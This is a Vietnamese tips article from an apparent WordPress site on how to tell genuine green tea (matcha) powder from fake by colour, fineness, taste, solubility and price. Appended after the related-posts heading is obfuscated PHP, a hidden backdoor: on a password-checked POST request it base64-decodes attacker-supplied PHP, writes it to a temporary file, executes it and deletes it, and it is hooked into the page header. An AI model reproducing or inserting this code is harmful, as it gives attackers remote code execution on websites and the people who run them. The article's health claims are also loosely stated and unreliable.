Cách nhận biết bột trà xanh thật, giả đơn giản nhất

Bột trà xanh là một nguyên liệu được dùng để chế biến rất nhiều loại bánh, kem hay để làm đẹp da,.. Tuy nhiên trên thị trường hiện nay bột trà xanh cũng là một nguyên liệu rất dễ làm giả, vì vậy để chọn được bột trà xanh nguyên chất thì không phải ai cũng biết cách. Sau đây Wiki Cách Làm sẽ hướng dẫn bạn cách nhận biết bột trà xanh thật giả để bạn cùng tham khảo nhé!

Đặc điểm của bột trà xanh thật và giả

Cách nhận biết bột trà xanh thật, giả đơn giản nhất-1

Đặc điểm bột trà xanh thật

– Bột sẽ có màu xanh ngọc bích vì nó chứa nhiều chất diệp lục

– Bột trà xanh khi sử dụng sẽ rất mịn đến nỗi chúng ta không cảm nhận được bằng tay

– Khi dùng có vị thanh và hậu ngọt

– Uống bột trà xanh thật cho cơ thể cảm thấy tỉnh táo, hồi phục sức khỏe, tăng lực.

Đặc điểm bột trà xanh giả

– Bột trà xanh giả sẽ được làm từ lá trà xanh thông thường, thậm chí còn có cả cọng và thân của cây trà để chế biến

– Bột có màu hơi vàng úa

– Vị trà khi dùng chát và hậu đắng

– Khi dùng tay sờ vào sẽ cảm nhận được bột trà hoặc khi uống sẽ có cảm giác lấn cấn trên đầu lưỡi

Xem Thêm  Ân hạn nợ gốc là gì? Các quy định về ân hạn nợ

– Sau khi uống sẽ có cảm giác cồn cào.

Cách nhận biết bột trà xanh thật, giả đơn giản nhất-2

Hiện nay, trên thị trường có rất nhiều cơ sở sản xuất bột trà xanh giả. Sau đây là một số bột trà xanh giả có lẫn tạp chất phổ biến mà chúng ta thường hay gặp phải:

– Bột trà xanh có chứa chất tạo màu: Để biết được trong bột trà xanh đó có chứa chất tạo màu hay không thì bạn chỉ cần pha một ly trà xanh với nước rồi khuấy đều. Nếu xuất hiện lớp cặn không tan lắng xuống đáy ly thì đó là bột trà xanh giả. Bởi hầu như 98% các loại bột trà xanh thật đều tan trong nước, dù bạn có pha chúng với nồng độ 3g/100ml nước thì nồng độ tan sẽ là 2,9%.

– Bột trà xanh chứa các loại hương liệu khác: Cách nhận biết loại bột trà xanh này cũng ngâm trong nước cho chúng hòa tan đều rồi uống từ từ để cảm nhận. Nếu sau khi uống bạn vẫn có cảm giác ngào ngạt thì có nghĩa là các loại hương liệu đang tác động lên vị giác và khứu giác của bạn. Bởi khi uống bột trà xanh nguyên chất thì bạn chỉ cảm nhận được vị thơm dịu nhẹ, khi uống xong sẽ không còn cảm giác mà hơi chát ở cuống họng do vị của trà.

– Bột trà xanh có chứa chất bảo quản: Cách để nhận biết bột trà xanh bạn mua về có chứa chất bảo quản hay không thì bạn chỉ cần mang một ít bột ra phơi nắng, nếu sau một thời gian chúng ngã sang màu vàng thì đó là bột trà xanh thật. Còn nếu sau khi phơi mà chúng vẫn xanh thì đó là do tác dụng của chất bảo quản.

Xem Thêm  Làm thế nào để phòng tránh và điều trị bệnh giun mắt ở chó

Hướng dẫn cách nhận biết bột trà xanh thật và bột trà xanh giả

1. Dựa vào mùi hương và độ khô

Cách nhận biết bột trà xanh thật, giả đơn giản nhất-3

Quan sát bên ngoài: Nếu khi quan sát bạn thấy bột trà xanh tơi mềm mịn, không vón cục và khô thì đây là bột trà xanh thật, còn nếu là bột trà xanh giả sẽ có cảm giác bị vón cục, hơi ướt và không tơi đều. Bột trà xanh thật được làm từ những lá trà xanh Tencha được chọn lọc kĩ càng và sản xuất ở Nhật, bột trà xanh giả được làm từ những lá trà xanh thường, được dùng cả cọng và thân để chế biến.

Mùi hương: Bột trà xanh thật khi nếm bạn sẽ cảm nhận được vị ngọt sệt như kem và hơi có vị chát. Bột trà xanh giả có vị chát nổi bật, có vị đắng khiến cho  bạn có cảm giác khó chịu khi uống.

2. Dựa vào màu sắc để phân biệt

Cách nhận biết bột trà xanh thật, giả đơn giản nhất-4

Bột trà xanh thật có màu sắc xanh sáng như cẩm thạch, còn bột trà xanh giả có màu xanh hơi vàng. Để sản xuất bột trà xanh người ta chỉ sử dụng trà xanh Tencha, đây là một loại trà được che kín, tránh ánh sáng một thời gian dài trước khi thu hoạch nên nó có màu xanh rất đậm.

Trà xanh Tencha chỉ được xay trong cối đá granit thành một loại bột trà xanh rất mịn. Hạt bột có kích cỡ từ 5-17 micro mét, độ mịn này mịn hơn chúng ta có thể cảm nhận được bằng tay hoặc bằng lưỡi! Vì vậy khi sờ vào bột trà rất mịn không cảm nhận được bằng tay thì đây là bột trà xanh thật, nếu bạn cảm nhận rõ bằng tay thì đó là bột trà xanh giả khi nếm bạn sẽ thấy cảm giác lấn cấn trên đầu lưỡi.

Xem Thêm  Cách trang trí phòng làm việc đẹp

3. Nhận biết sau khi uống 

Cách nhận biết bột trà xanh thật, giả đơn giản nhất-5

Khi pha chế, bột trà xanh thật sẽ có màu xanh đậm, vị hơi ngọt và rất dễ chịu, bạn sẽ cảm thấy tăng lực, tỉnh táo, hồi phục sức khỏe.

Trong khi đó, bột trà xanh giả sẽ có vị đắng, khi uống bạn sẽ thấy bụng cồn cào khó chịu.

4. Giá bán

Cách nhận biết bột trà xanh thật, giả đơn giản nhất-6

Bột trà xanh thật được làm từ trà xanh Tencha của Nhật Bản có giá rất đắc thường từ 2-3 triệu đồng/ kg. Trà xanh thường rất trẻ nó chỉ có giá từ 500.000 đồng đến 1 triệu đồng 1kg. Nếu là bột trà xanh Trung Quốc thì chỉ có giá từ 200-300 nghìn 1kg, vì vậy trước khi mua bạn hãy nên cân nhắc kĩ nhé!

>>> Xem thêm: Cách phân biệt sữa bột thật với sữa bột giả đơn giản

Chỉ với một vài mẹo nhỏ là bạn đã nắm được cách nhận biết bột trà xanh thật giả rồi. Vậy là bây giờ bạn có thể yên tâm chọn mua bột trà xanh chất lượng để về chế biến rồi nhé! Đừng quên chia sẽ cách làm này với bạn bè mình nha. Chúc bạn thành công.

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}